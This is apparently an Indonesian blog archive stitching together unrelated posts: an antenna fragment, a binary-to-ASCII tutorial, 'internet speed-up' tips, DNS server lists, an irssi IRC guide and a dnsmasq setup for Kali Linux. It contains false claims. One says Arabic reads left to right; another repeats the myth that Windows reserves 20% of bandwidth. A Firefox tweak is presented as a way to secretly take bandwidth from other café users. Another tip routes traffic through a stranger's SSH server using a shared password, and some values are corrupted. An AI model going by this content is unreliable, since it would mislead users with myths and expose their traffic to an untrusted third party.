Antena directional contohnya, antena ini mengurangi interferensi co-channel, sehingga jika tidak sectorised maka sel akan dilayani oleh antena Omnidirectional yang akan memancarkan ke segala arah. Struktur khas tesebut dikenal sebagai trisector tetapi juga dikenal sebagai semanggi, di mana terdapat tiga sektor yang dilayani oleh antena secara terpisah.
Setiap sektor memiliki arah yang terpisah dari pelacakan, khususnya untuk arah 120° masih berhubungan dengan antena yang ada didekatnya. Orientasi lain juga dapat digunakan untuk menyesuaikan dengan kondisi lokal, contohnya sel Bisectored juga bisa diimplementasikan. Sel Bisectored inilah yang paling sering berorientasi dengan antena dengan melayani sektor pemisahan 180° satu sama lain, tapi sekali lagi tergantung variasi lokal yang ada. [MG]

MEMBACA BINARY CODE

1. Pengenalan

Ketika kita melihat sistem biner maka yang kita temukan hanyalah sekumpulan digit yang hanya tersusun dari angka 0 dan 1 dan tampak acak sehingga sangat sulit bagi kita untuk bisa memahami apa sebenarnya yang direprsentasikan oleh digit-digit tersebut, seperti:

010010101010101001101011

Tetapi pada dasarnya sekumpulun 0 dan 1 ini bisa direpresentasikan dengan angka desimal dan pertama-tama tentu kita mencoba membaca desimal yang terwakili di dalam sekumpulan 0 dan 1 tersebut. Dan dari angka desimal kemudian bisa diterjemahkan ke dalam teks. Memang komputer sendiri tidak menggunakan sistem desimal ini ketika teks-teks di dalam komputer terkonversi menjadi sistem biner. Jadi cara baca kita ini bukan proses yang dilalui oleh komputer.

2. Sistem Biner


Pertama-tama dalam membaca biner kita layaknya sedang berhadapan dengan bahasa Arab atau Hebrew di mana kita harus membacanya dari kiri ke kanan. Dan sekumpulan angka 0 dan 1 itu biasanya (biasanya apa pasti begitu ya hehehe bukan orang komputer nih, tapi nampaknya kalau melihat 8 bit sih ya memang dibagi ke dalam per 8 digit?) dibagi ke dalam 8 digit maksimal dan setiap digit secara berurutan merepresentasikan nilai value kali 2 selamanya. Jadi nilai-nilai tersebut dimulai dari kanan adalah sebagai berikut:

- Digit pertama adalah bernilai 1
- Digit kedua adalah bernilai 2 yaitu 1 x 2
- Digit ketiga adalah bernilai 4 yaitu 2 x 2
- Digit keempat adalah bernilai 8 yaitu 4 x 2
- Digit kelima adalah bernilai 16 yaitu 8 x 2
- Digit keenam adalah bernilai 32 yaitu 16 x 2
- Digit ketujuh adalah bernilai 64 yaitu 32 x 2, dan
- Digit kedelapan adalah bernilai 128 yaitu 64 x 2 (dan seterusnya dengan kelipatan kali 2 dari digit sebelumnya)

Kemudian, angka 0 dan dan 1 merupakan perwakilan dari salah dan benar (False or True) atau dengan kata lain adalah (yes or no) sehingga ketika digit pertama dipresentasikan dengan angka 1 maka nilai 1 adalah benar dan begitu seterusnya. Dalam contoh akan menjadi lebih jelas sebagai berikut:

10101 adalah sekumpulan sistem biner yang terdiri dari 5 digit di mana digit pertama adalah benar, digit kedua adalah salah, digit ketiga adalah benar, digit keempat adalah salah, dan digit kelima adalah benar. Maka terjemahan sekumpulan biner ini dalam desimal adalah 21. Atau dengan kata lain, ketika anda menginginkan desimal bernilai satu maka dalam biner anda menuliskannya dengan 0 1 dan kalau anda menginginkan nilai 2 maka dalam biner dituliskan dengan 1 0. Misalkan anda ingin merepresantasikan 8 dalam bentuk biner maka anda menuliskan 0 untuk digit pertama karena anda tidak meninginkan nilai 1, menuliskan 0 untuk digit kedua karena begitu juga, dan seperti itu juga pada digit ketiga karena anda tidak menginginkan nilai 4, tapi anda menuliskan 1 pada digit keempat karena digit empat bernilai 8 sehingga akan menjadi 1 0 0 0.

Hal yang terpenting juga, semua digit 0 dari kiri ke kanan tidak terlalu penting karena 1000 akan bernilai sama dengan 0001000. Akan lebih jelas dalam bentuk sebagai berikut:

Pertanyaan, sekumpulan biner ini merepresentasikan apa dalam desimal?
a) 100
b) 000100
c) 100000
d) 0010

Jawabannya:
a) 4
b) 4
c) 32
d) 2

Apabila kita sudah mengerti jawaban di atas maka pada dasarnya kita sudah mengerti sistem dasar biner. Kemudian apabila kita paham dengan nilai yang selalu kelipatan 2 ini maka bagaimana kita merepresentasikan nilai desimal yang ganjil di mana tidak bisa dikali 2. Untuk mendapatkan nilai tersebut maka dalam biner kita tambahkan dengan nilai yang diwakili oleh digit itu sendiri. Misalnya kita menginginkan nilai 3 maka dalam biner dipresentasikan dengan benar pada digit pertama dan benar pada digit kedua maka tertulis dalam biner dengan 1 1, maka nilai 1 pada digit pertama ditambahkan dengan nilai 2 pada digit kedua = 3. Ini adalah total nilai dalam sekumpulan biner dan begitulah cara merepresantasikanya dalam biner

Dalam contoh lain, kita ingin merepresentasikan nilai 5 dalam binary maka kita membutuhkan untuk menambahkan nilai digit pertama dengan digit ketiga. Nilai 5 tertulis dalam biner dengan 101 dan kita membacanya sebagai berikut:

- 101 kita baca dari kanan adalah 1 (satu) + 0 (dua) + 1 (empat) = 5. Dalam contoh lain:
- 001011 kita baca dari kanan adalah 1 (satu) + 1 (dua) + 0 (empat) + 1 (delapan) + 0 (enambelas) + 0 (tiga puluh dua) = 11. Jadi yang kita jumblah adalah nilai dalam kurung apabila bernilai 1 pada binernya.

Pertanyaan, berapa nilai desimal dari rangkaian biner berikut:
a) 11011
b) 110
c) 010101
d) 10110

Jawabannya:
a) 27
b) 6
c) 21
d) 22

Apabila kita sudah mengerti ini maka pada dasarnya kita sudan mengerti sistem biner. Memahaminya memang susah, tetapi menjadi mudah dengan begini kan? Sekarang bagaimana makna biner tersebut dalam teks.


3. Membaca biner ke dalam teks (ASCII)
Yuk Belajar Binary Code !!!

ASCII pada dasarnya adalah hurup-hurup, angka-angka, dan simbol-simbol (hurup simbol) yang tampak dalam komputer kita yang sudah terwakilkan dalam bentuk font sehingga sudah kita baca dalam bahasa manusia. Hal itu bisa kita pahami bahwa setiap kali kita mengetikkan suatu hurup dari keyboard maka itu kemudian dikonversi dalam code yang sesuai dan tepat, apa saja tut yang kita tekan baik berupa angka atau hurup.

Sebagai contoh, dalam sebuah binary yang panjang kita tuliskan sebagai berikut:
0100100001100101011011000110110001101111

Dari sekian banyak sekumpulan kode biner ini terwakili beberapa hurup dan angka untuk code ASCII. Dan dengan delapan digit saja sudah lebih dari cukup untuk mempresentasikan sekian hurup dan angka dan sebagaimana pada dasarnya kode-kode biner dipisahkan dalam 8 digit di mana itu merupakan presentasi 8 bits setiap hurup. Maka code di atas kita baca seperti ini:
01001000 - 01100101 - 01101100 - 01101100 - 01101111

Setelah itu kita mencoba membaca nilai desimal dari setiap 8 digit ini dengan mengkalkulasikan setiap nilai dari digit yang mewakilinya, sebagai berikut:

01001000 = 72
01100101 = 101
01101100 = 108
01101100 = 108
01101111 = 111

Kalau dalam membaca nilai setiap digit yang diwakili code biner tersebut dari sebelah kanan, maka membaca nilai ASCII tetap dilakukan dari kiri sehingga code biner dalam contoh di atas adalah 72, 101, 108, 108, 111. Sekarang hurup apa saja yang diwakili oleh angka-angka ini dalam code ASCII, baik hurup, angka atau hurup simbol? Tentu kita harus melihat table code ASCII. Akan tetapi dengan komputer bisa dilakukan dengan mudah, yaitu dengan menekan tombol ALT + [Angka tersebut]. Dari contoh di atas, satu persatu kita tekan ALT + 72 dan seterusnya maka hasil yang kita dapatkan adalah:

72 = H
101 = e
108 = l
108 = l
111 = o
Maka code biner dalam contoh kita tersebut bisa dibaca dengan bahasa manusia yang ternyata adalah Hello.

Pertanyaan, bacalah code ini dalam teks?
01000011011011110110111001100111
01110010011000010111010001110101
01101100011000010111010001101001
01101111011011100111001100100001

Tentu saja langkah pertama adalah dengan membaginya dalam delapan digit yakni 8 bit, seperti sebagai berikut:
01000011 - 01101111 - 01101110 - 01100111 - 01110010 - 01100001 - 01110100 - 01110101 - 01101100 - 01100001 01110100 - 01101001 - 01101111 - 01101110 - 01110011 - 00100001

Silahken dicari sendiri jawabannya, jangan nyontek ya...oiya, tanda - sengaja ane tambahkan untuk mempermudah pembagian aja gan. :D

Kamis, 06 April 2017

Cara Mengubah Setting bandwith Pada windows

Pada dasarnya OS windows sudah membatasi bandwidth untuk koneksi internet sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal,Jika anda ingin menambah bandwidth internet supaya koneksinya terasa lebih cepat dan kencang bisa dengan cara mengurangi atau mengosongkan batasan bandwidth tersebut supaya pada Windows kita bisa maksimal dalam menggunakan bandwidth yang sudah ada.

Ikuti petunjuknya seperti dibawah ini :

1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
5. Setelah masuk klik Administrative Templates
6. Kemudian Klik Network
7. Setelah terbuka klik QoS Packet scheduler
8. Kemudian klik Limit Reservable Bandwidth
9. Dan setelah terbuka ubah setting menjadi Enable
10. Kemudian ubah Bandwidth Limitnya menjadi 0
11. Klik Apply,ok
12. Kemudian keluar dan Restart komputer

II. Gunakan DNS dari OpenDNS untuk koneksi internet yang lebih cepat dan lebih aman.

1. Klik Start
2. Klik Control Panel
3. Pilih Network & Internet Connection
4. Klik Network Connection
5. Klik Kanan Local Area Connection pilih Properties
6. Pilih Internet Protocol (TCP/IP) kemudian Klik Properties
7. Klik Use Following DNS Server
8. Isi Preferred DNS Server dengan angka : 208.67.222.222
9. Isi Alternate DNS Server dengan angka : 208.67.220.220
10. Kemudian Klik OK

III. Jika menggunakan Browser Firefox gunakan add on Fasterfox, bisa di download disini.

Fasterfox adalah sebuah add on yang berfungsi untuk mempercepat koneksi dengan melakukan optimasi pada network dan cache browser. Fungsi dari cache adalah untuk menyimpan data sementara dari website yang kita kunjungi, sehingga ketika kita membuka kembali website tersebut proses loading-nya akan lebih cepat karena datanya telah disimpan di cache.

Beberapa optimasi yang dapat dilakukan oleh fasterfox adalah: HTTP pipelining, Memory caching,Disk caching,DNS caching,FastBack caching.

IV. Bagi pengguna Firefox, silahkan pasang Adblock

Fungsinya adalah untuk mem-filter iklan-iklan yang tidak perlu pada saat kita browsing, sehingga proses loading akan menjadi lebih cepat dan maksimal.

II. Menurut tulisan itu, ada beberapa cara untuk meningkatkan kecepetan akses internet di antaranya dengan menyetting browser, menggunakan openDNS atau menggunakan Google Web Accelerator.

Setting melalui openDNS sendiri sebenarnya banyak yang meragukan apakah bisa membuat koneksi cepat atau ga ada pengaruh apa-apa, coba anda baca polemiknya di forum. Sedangkan Google Web Accelerator didesain jika anda menggunakan koneksi broadband seperti cable dan DSL, tetapi untuk dial-up (mis. telkomnet instan atau speedy) juga dapat mempercepat koneksi. Untuk memakai Google Web Accelerator anda harus memenuhi kriteria antara lain Operating system harus windows XP atau windows 2000 dan browser nya harus (minimal) IE 5.5+ atau Mozilla Firefox 1.0+. kalau untuk browser lain juga bisa tetapi harus menkonfigurasi proxy settingsnya dari browser anda dengan menambah 127.0.0.1:9-100 pada HTTP. Setelah melakukan instalasi, Google web accelerator akan menampilkan icon kecil di atas browser dan icon tray di pojok bawah layar desktop.

Untuk cara Setting Browser, silakan ikuti cara2 ini:

Pengguna Internet Explorer:

1. Pilih menu [Tools]
2. Pilih [Internet Option]
3. Klik tab [General]
4. Pada opsi “Temporary Internet Files” klik [Setting] lalu geser slider-nya


III. Koneksi internet yang cepat adalah dambaan setiap orang, seperti cewe cantik juga yang merupakan dambaan setiap orang.:-) kembali ke masalah mempercepat koneksi internet, tapi tips ini hanya berlaku untuk yang di warnet saja dan warnetnya menggunakan mozzila firefox sebagai browsernya. tujuannya adalah mempercepat koneksi internet di komputer kita dengan menyedot bandwitdh komputer lain di dalam 1 warnet. licik juga sih tips ini tapi tidak apa-apa, apalagi di saat warnet yang sedang penuh dan semua komputer lambat, jadi cara ini bisa kita pakai. jadi koneksi internet kita jadi lebih cepat dan yang lain jadi sedikit lambat. kan kalo warnet lagi penuh semuanya lambat, jadi tidak akan pada menyadarinya. okeh saya akan memberitahukan untuk anda, begini caranya untuk mempercepat koneksi internet di warnet:

1. Di address bar mozzila ketik about:config kemudian akan terlihat tulisan yang banyak sekali

2. Gunakan fasilitan ctrl+f untuk mencari kata, kata yang di cari adalah sebagai berikut dan di rubah

* Network.http.pipelining; False <– klik 2 kali ubah “False” menjadi “True“
* Network.http.pipelining.maxrequests; 4 <-- klik 2 kali ubah “4” menjadi “30“
* Network.http.proxy.pipelining; False <– klik 2 kali ubah “False” menjadi “True“

3. Kemudian klik kanan di bagian yang kosong/putih terus pilih new terus integer lalu kolom pertama isikan nglayout.initialpaint.delay lalu tekan enter satu kali dan masukan angka 0 dan tekan enter kembali.

4. Restart ulang mozzila firefoxnya

5. Selamat berinternet ria dengan cepat, karena bandwitdh akan tersedot ke komputer anda, ini tadi adalah tips mempercepat koneksi internet di warnet.

IV. Jangan terbayangkan bahwa koneksi kita sangat cepat sekali, kita hanya akan menggunakan teknik Tunneling. Pada dasarnya jika kita mengakses sebuah server (website), komputer kita diarahkan secara langsung ke server tersebut. Misal kita akan membuka sebuah halaman website yang servernya terletak di Amerika, maka komputer kita secara langsung mengaksesnya ke server tersebut. Atau lebih sederhananya jika kita inging mengambil sesuatu yang ada di Amerika maka kita harus pergi sendiri ke Amerika.

Terbayangkan oleh kita bergitu rumitnya perjalanan yang kita lewati, begitu banyaknya hambatan yang kita hadapi. Begitupun dunia networking. Teknik tunneling sama halnya dengan teknik pengiriman barang dengan bantuan kurir. Jika kita akan mengirim atau mengambil barang ke Amerika maka kita tidak perlu melakukannya sendiri, biarlah jasa kurir yang melakukan semua kerumitan dan hambatan yang dihadapi agar barang tadi bisa sampai ke tujuan.

Begitupun tunneling, pada saat kita mengakses sebuah halaman webiste maka komputer kita hanya akan meminta bantuan sebuah server untuk menyampaikan dan mengambil halaman demi halaman website yang kita tuju. Selain itu server tunnel akan mengkompresi data yang kita butuhkan, karena itulah koneksi internet kita secara keseluruhan akan meningkat.

Sederhanakan? Tapi kemudian muncul pertanyaan, apakah bisa hal tersebut gratis? Bisa ya bisa tidak. Sekarang sudah banyak server tunnel yang menyediakan fasilitas ini, misal Nitro, Toonel(dot)Net, TrafficCompressor, OnSpeed dan masih banyak yang lainnya. Gratiskah mereka? Jelas tidak, kecepatan yang mereka tawarkan harus ditebus dengan muahal alias berbayar. Lalu buat apa saya menulis ini? Ya karena saya ingin berbagi server tunnel yang GRATIS. Baik mari kita bahas cara menghubungkan komputer kita ke server tunnel yang gratis, tapi ada beberapa hal yang harus diperhatikan sebelum membahas.

1. Komputer anda harus terkoneksi dengan internet.
2. Teknik tunnel ini cocok bagi yang menggunakan koneksi internet dengan fasilitas GPRS, tapi bisa juga untuk jenis koneksi lain.
3. Harus sudah terpasang software tunneling, misal putty, silahkan anda download pada bagian sebelah kanan blog (DEHAFILE).

Ikuti langkahnya :

1. Download PuTTY , lihat link sebelah kanan (DEHAFILE)
2. Ekstrak menggunakan WinRAR dan simpan PuTTY.exe pada C:WINDOWS
3. Biarkanlah PuTTY tidur disana, tidak usah diaktifkan
4. Klik Start Menu => Run dan masukan “putty -P 222 -N -D 9999 -C net@cepat.abangadek.com” tanpa tanda petik (”) setelah itu jendela DOS akan terbuka.
5. Pada saat diminta password, ketikan “cepat123” tanpa tanda petik (”) dan Enter, tapi jangan heran pada saat memasukan password anda tidak melihat apapun, makanya anda harus hati-hati memasukan password, jika salah maka PuTTY akan memberitahu anda, jika salah lagi maka PuTTY akan terminate (close). Jika setelah memasukan password PuTTY tidak ada reaksi (kursor hanya turun) maka anda sudah betul
6. Arahkan agar browser menggunakan SOCKS proxy di localhost, port 9999 (lihat gambar dibawah)
7. Selamat browsing dengan kecepatan baru tapi ingat ucapkan terima kasih pada Mas Harry karena sudah berbaik hati meminjamkan server-nya yang di Singapura untuk Tunneling, mudah-mudahan amal kebaikannya di balas oleh Allah SWT.
8. Tutorial Ini Wajib & Harus: Memiliki Server Untuk Tunneling. Free Server Tunneling Bisa Didapat Di Internet / Dari Server Anda Sendiri.


V. Tadi lagi iseng-iseng browsing eh nemu tips yang satu ini, sebenarnya gimana sih settingan dan cara kerja dari pemanfaatan cahe ini??. Ini adalah cara untuk mempercepat koneksi internet yang smart.

Cache sebenernya berfungsi supaya kita browser yang kita gunakan tidak perlu lagi me load file-file yang sebelumnya sudah kita download(web yang pernah kita kunjungi, nah dengan cara ini kita bisa menyimpan cache secara besar, dan ada juga pem-blokir trojan nya lagi. mantab deh pokok nya.

Untuk ukuran penyimpanan cache bisa tak terbatas tergantung dari besar muatan hardisk anda. Jadi untuk memperbesar cache bisa sesuai dengan keinginan anda.

Ada beberapa konfigurasi yang di lakukan untuk melakukan cara ini, langkah-langkah nya adalah sebagai berikut:

Konfigurasi :
1. Klik tool pada menu internet explorer, klik internet options

2. Pada tab connection, klik LAN Settings

3. Proxy Server diberi tanda centang, isikan Address “127.0.0.1? & set port, misal “8080?

4. Klik ok

5. Pada tab advanced, lihat pada tree HTTP 1.1 settings, beri tanda centang :
- Use HTTP 1.1
- Use HTTP 1.1 through proxy connection

6. Klik ok

Bagi yang menggunakan internet melalui akses dial-up, cara settingnya :

1. Klik tool pada menu internet explorer, klik internet options

2. Pada tab connection, frame Dial-UP and Private Network Settings, klik Settings

3. Proxy Server diberi tanda centang, isikan Address “127.0.0.1? & set port, misal “8080?

4. Klik ok

5. Pada tab advanced, lihat pada tree HTTP 1.1 settings, beri tanda centang :
- Use HTTP 1.1
- Use HTTP 1.1 through proxy connection

6. Klik ok

Bagi yang pakai mozilla firefox ada juga settingannya di Menu Tool, Sub menu Option, Network connection, klik setting, Proxy Server diberi tanda centang, isikan Address “127.0.0.1? & set port tool ini, misal “8080? dan klik ok.

VI. Koneksi internet anda lelet? Silahkan anda coba software Onspeed 6.0.9 , software ini bisa meningkatkan kecepatan internet anda hingga 10 kali lipat!!!(Dial-up – 10x Faster, Broadband – 5x Faster, Mobile connections – 8x Faster). Saya pribadi memang tidak menggunakan software ini (karena selama ini memakai koneksi lewat warnet terus), tapi bolehlah anda coba (taruh komentar anda ya… apakah software ini benar-benar berfungsi apa tidak)

Di bawah ini ada beberapa software lainnya yang bisa anda gunakan untuk meningkatkan kecepatan browsing internet anda:

- Flash Speed 200%
Flash Speed 200% is an Internet accelerator that help you optimize your Internet connection speed 200% or more. The software changes some Windows settings to give you faster performance, and optimize your Internet connection speed 200% or more according to your computer. It support optimiz Dial-Up, Lan, Cable, ADSL, HDSL, VDSL and PPPoE connections up to 200% faster. Increase your download speeds.

Download Flash Speed 200%

- CFosSpeed
Tool ini Untuk Mempercepat Akses Internet Cocok Buat Koneksi Lemot (Traffic Compresson System)

Download CfosSpeed

- Dsl Speed
DSL Speed is a prefessional tool that will online optimize your
DSL(e.g.,ADSL,G.lite,IDSL,SDSL)connection speed to MAX.
Main Features:
Online optimize your DSL (ADSL) connection speed.
Auto verify your ISP’s MTU and your DSL (ADSL) unique optimize
value.
Faster loading Web Pages.
Tweaks DNS Errors Caching In Windows 2000/XP.
Tweaks ICS In Windows 98SE.

Download DSL Speed

- Internet Turbo
Software untuk meningkatkan kecepatan internet

Download Internet Turbo

- Modem Boster
Software untuk mempercepat kinerja Modem

Download Modem Boster

- Firefox Ultimate Optimizer
Software untuk optiamasi Browser firefox

Download Firefox Ultimate Optimizer

- Fasterfox
Add-ons untuk browser Firefox. Setelah Fasterfox selesai terinstall, restart Firefox anda. Tanda kalau Fasterfox sudah terinstall di Firefox anda adalah akan ada gambar rubah kecil di sisi kanan bawah Firefox anda.

Download add-on FasterFox

- Google Web Accelerator
Tanda kalo GoogleWebAccelerator sudah terinstall di web browsing anda adalah akan ada gambar jam kecil di web browsing anda. GoogleWebAccelerator akan menunjukkan berapa banyak waktu yang telah dihemat karena menggunakan GoogleWebAccelerator.

Download Google Web Accelerator

- FullSpeed2.7

Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet connection. Full Speed will increase your online Internet speed with everything you do: faster downloading, web browsing and web page loading, data streaming, email, P2P and gaming. Full Speed will also improve the performance of business communications which utilise Broadband technologies including Remote Desktop sessions, Intranets and Extranets over VPN’s and WANs . One click it’s done; no questions or any knowledge is required. Full Speed has a ‘Clean’ Award from Softpedia confirming that it is completely Spyware FREE. Full Speed also has no banners, popups, adverts, contracts, subscriptions, viruses or malware of any kind. Free performance testing software is also included for testing and comparison of download speeds and Web browsing performance.

VII ngaruh nih.. settingan dns :)

Daftar DNS Server Indonesia :

Server DNS indosat.net.id termasuk DNS Indosat IM2

* 202.155.0.10
* 202.155.0.15
* 202.155.0.20
* 202.155.0.25
* 202.155.46.66
* 202.155.46.77
* 202.155.30.227

DNS Telkom.net.id Telkom Speedy

* 202.134.2.5
* 202.134.0.155
* 202.134.1.10
* 202.134.0.62
* 202.159.32.2
* 202.159.33.2
* 202.155.30.227

DNS AWARI (Asosiasi Warnet Indonesia)

* 203.34.118.10
* 203.34.118.12

DNS sat.net.id

* 202.149.82.25
* 202.149.82.29

DNS cbn.net.id

* 202.158.40.1
* 202.158.20.1

* 202.158.3.7
* 202.158.3.6

Singnet Singapore

* 165.21.100.88
* 165.21.83.88

DNS indo.net.id

* 202.159.32.2
* 202.159.33.2

DNS itb.ac.id

* 202.249.24.65
* 167.205.23.1
* 167.205.22.123
* 167.205.30.114

DNS ukdw.ac.id

* 222.124.22.18

Daftar DNS Luar indonesia :

DNS Open DNS

* 208.67.222.222
* 208.67.220.220

DNS ScrubIt

* 67.138.54.100
* 207.225.209.66

DNS DNSadvantage

* 156.154.70.1
* 156.154.71.1

DNS vnsc-pri.sys.gtei.net

* 4.2.2.1
* 4.2.2.2
* 4.2.2.3
* 4.2.2.4
* 4.2.2.5
* 4.2.2.6

Verizon (Reston, VA, US)

* 151.197.0.38
* 151.197.0.39
* 151.202.0.84
* 151.202.0.85
* 151.202.0.85
* 151.203.0.84
* 151.203.0.85
* 199.45.32.37
* 199.45.32.38
* 199.45.32.40
* 199.45.32.43

GTE (Irving, TX, US)

* 192.76.85.133
* 206.124.64.1

One Connect IP (Albuquerque, NM, US)

* 67.138.54.100

OpenDNS (San Francisco, CA, US)

* 208.67.222.222
* 208.67.220.220

Exetel (Sydney, AU)

* 220.233.167.31

VRx Network Services (New York, NY, US)

* 199.166.31.3

SpeakEasy (Seattle, WA, US)

* 66.93.87.2
* 216.231.41.2
* 216.254.95.2
* 64.81.45.2
* 64.81.111.2
* 64.81.127.2
* 64.81.79.2
* 64.81.159.2
* 66.92.64.2
* 66.92.224.2
* 66.92.159.2
* 64.81.79.2
* 64.81.159.2
* 64.81.127.2
* 64.81.45.2
* 216.27.175.2
* 66.92.159.266.93.87.2

Sprintlink (Overland Park, KS, US)

* 199.2.252.10
* 204.97.212.10
* 204.117.214.10

Cisco (San Jose, CA, US)

* 64.102.255.44
* 128.107.241.185
=====================================================================================

Selasa, 04 April 2017

Chatting Di Terminal Menggunakan IRSSI Di Linux

halo selamat malam gays ,

yaps sesuai judul kali ini gue akan share gimana sih chatting di terminal biar kaya di film film hacker ?

*yaelah korban film nih TS :v

*engga anjay !!! ini serius !

yuk langsung aja

pertama siapin bahan .






Kode: Pilih semua
apt-get update && apt-get install irssi

[+] Setelah menginstal, menjalankan irssi dengan mengetik di terminal:
Kode: Pilih semua
irssi

[+] Sekarang, Anda dapat bergabung di saluran kami dengan perintah:
Kode: Pilih semua
/connect chat.freenode.net

kemudian,
Kode: Pilih semua
/join #hackerinside


Gunakan IRC Client pada SmartPhone
Jika Anda ingin mengakses IRC dengan smartphone Anda, silahkan download IRC klien pada PlayStore Anda (untuk Android), atau AppStore (untuk iOS). Penggunaan yang cukup dekat seperti dijelaskan di atas.

Jangan lupa untuk mengatur panggilan Anda dengan mengetikkan perintah:
Kode: Pilih semua
/nick yournickname

Kemudian mulai chat Anda biasanya.

Penggunaan Perintah Dasar Di irssi [IRC]

 

Disini kita menggunakan server freenode



Koneksi ke Salah Satu Server IRC
Sangat penting untuk kita mengkoneksikan irssi ke salah satu server IRC (Tempat chat/log kita nanti). Nah, untuk mengkoneksikannya kita hanya perlu mengetikkan perintah:

Code: Select all
/connect IRC.SERVER.NET

Ganti "IRC.SERVER.NET" dengan alamat server IRC yang akan Anda masuki. Karena disini kita menggunakan freenode, maka perintahnya akan seperti ini:

Code: Select all
/connect chat.freenode.net

atau,

Code: Select all
/connect irc.freenode.net

Masih banyak lagi server IRC yang disediakan orang-orang. Kita bisa mencarinya di google dengan kata kunci "Server IRC list". Tapi kebanyakan orang menggunakan server irc.dal.net dan beberapa server freenode, seperti contoh diatas.


Mengganti Nickname

Biasanya setiap kita masuk ke irssi Nickname kita akan default menggunakan nama system device kita. Seperti contoh, Akun di laptop Anda beri nama GoodDay, maka Nickname kita di irssi saat pertama membukanya akan mendapatkan nickname GoodDay. Nah, jika akun yang Anda gunakan di laptop Anda menggunakan nama root, maka Nickname default Anda akan menjadi root. Nah, jika Anda ingin mengganti Nickname Anda, bisa menggunakan perintah:

Code: Select all
/nick NICK_BARU

Ganti "NICK_BARU" dengan Nickname yang Anda inginkan.


Mengklaim atau Meregistrasikan Nickname

Code: Select all
/msg nickserv register PASSWORD EMAIL

Ganti "PASSWORD" dengan password yang Anda tentukan.
Ganti "EMAIL" dengan email Anda, (Penting, untuk konfirmasi).
Nanti server akan mengirim email ke alamat email Anda yang berisi perintah untuk melakukan konfirmasi pendaftaran.


Untuk Login atau Identify Saat Masuk IRC

Gunakan dulu Nickname yang sudah diregistrasikan, lalu ketik perintah:

Code: Select all
/msg nickserv identify PASSWORD

Ganti "PASSWORD" dengan password Anda saat mendaftarkan Nickname tersebut.


Join ke Sebuah Channel

Code: Select all
/join #NAMA_CHANNEL

Ganti "NAMA_CHANNEL" dengan nama channel yang ingin Anda masuki. Jika Anda tidak tahu salah satu nama channel yang ada, Anda bisa mencarinya di google dengan kata kunci "channel IRC hacker indonesia" dan lain-lain. Jangan lupa untuk memberi tanda # sebelum nama channel. seperti contoh perintah di atas.


Keluar Dari Channel

Untuk keluar dari channel tanpa harus menutup irssi, Anda bisa menggunakan perintah:
Code: Select all
/leave



Memindahkan Tab

Didalam irssi kita memiliki fungsi Tab yang sama seperti fitur chat lainnya. Tab 1, Tab 2, Tab 3, dst. Nah di irssi Tab 1 pasti akan menjadi default server (Tempat perintah/log/notifikasi), dan setelah kita /join ke sebuah channel, maka Tab ke-2 akan terbuka, dan kita akan dipindahkan langsung ke Tab ke-2. Dan jika Anda mengirim pesan pribadi ke user lain dengan menggunakan /msg (Akan dibahas di bawah), maka Tab ke-3 akan terbuka, begitu seterusnya setiap Anda menggunakan perintah /msg ataupun /join.

Nah, untuk berpindah dari Tab 1 ke Tab yang lain, Anda bisa menggunakan perintah:

Code: Select all
/window NOMOR_TAB

Ganti "NOMOR_TAB" dengan Angka Tab tersebut, contoh kita ingin pindah ke Tab yang pertama, /windows 1. Kita ingin pindah ke Tab yang kedua, /window 2. Dan seterusnya.

*Anda bisa juga berpindah ke Tab 1 ke Tab lainnya dengan menggunakan kombinasi keyboard:
ALT+NOMOR_TAB



Menutup Sebuah Tab

Anda bisa menutup tab yang sudah tidak Anda gunakan, dengan perintah:

Code: Select all
/window close NOMOR_TAB

atau, secara singkat:

Code: Select all
/wc NOMOR_TAB

Ganti "NOMOR_TAB" dengan nomor Tab yang akan Anda tutup, dan cara mengetahui Tab berapakah yang sedang Anda buka dengan cara melihat tepat di bagian atas input message (tempat Anda menulis pesan/perintah). Disitu ada display yang menunjukkan:
[ Jam ] [ Nickname_Anda ( Flags_Anda ) ] [ Nomor_Tab:Nama_Server/#Nama_Channel ( Flags_Channel ) ]

Nah, Dengan melihat itu Anda bisa tahu nomor Tab yang sedang Anda buka.


Mengirim Pesan Pribadi ke User Lain
Anda ingin mengirim private chat kepada user lain yang Anda temui di sebuah channel atau dari mana pun? Anda bisa menggunakan perintah:

Code: Select all
/msg NICK_USER PESAN ANDA

Ganti "NICK_USER" dengan Nickname user yang ingin Anda kirimi pesan pribadi Anda.
Ganti "PESAN ANDA" dengan pesan yang ingin Anda kirimkan.
Setelah Anda tekan ENTER/Kirim, pasti Anda akan bingung kenapa tidak tersesuatu perpindahan Tab atau lainnya (Tidak ada output atau hasil apapun) setelah Anda mengirimkan perintah tadi. Nah, Jangan bingung. Sebenarnya Tab baru telah terbuka dengan Anda menggunakan perintah /msg tadi. Anda tinggal berpindah ke Tab lainnya untuk mengecek yang mana Tab yang berisikan pesan pribadi Anda tadi. Anda cukup memindahkan Tabnya dengan cara memindahkan Tab di atas.

Home Kali linux Cara Menambah Kecepatan Internet di Kali Linux 2.0 Cara Menambah Kecepatan Internet di Kali Linux 2.0

Pada kesempatan saya akan memberi tutorial tentang bagaimana cara mempercepat koneksi di kali linux 2.0 . oke saya akan memulai menjelakan tentang bagaimana cara mempercepat koneksi internet di kali linux 2.0. Berikut tutorial tersebut ..

Pertama anda install dnsmasq

Ketik di terminal anda : apt-get install dnsmasq

Lalu melakukan pengeditan konfigurasi,,

Dengan mngetik di terminal : nano /etc/dnsmasq.conf

kemudian tekan (ctrl+w) baris:~#listen-address= hapus hastaq(#)-nya dan isi value 127.0.0.1 (listen-address=127.0.01)
Lalu save untuk menyimpan perubahannya

Lalu edit setting dhclient.conf

Dengan cara ketik di terminal : nano /etc/dhcp/dhclient.conf
                                      Atau  : nano /etc/dchp3/dhclient.conf

Cari (ctrl+w) Baris:#supersede domain-name "fugue.com home.vix.com";
#prepend domain-name-servers 127.0.0.1;
request subnet-mask, broadcast-address, time-offset, routers,
domain-name, domain-name-servers, domain-search, host-name,
dhcp6.name-servers, dhcp6.domain-search,
netbios-name-servers, netbios-scope, interface-mtu,
rfc3442-classless-static-routes, ntp-servers;
hapus kedua hastag (#)-nya yang berada di depan supersede dan prepend

Dan lalukan hal yang untuk save dan exit
sekarang buka resolv.conf untuk menambah nama server nya
dengan cara mengetik di terminal : nano /etc/resolv.conf

Tambahkan nameserver=127.0.0.1 pada baris pertama

ctrl+x lalu y dan tekan enter
lalu restart dnsmasq tadi..
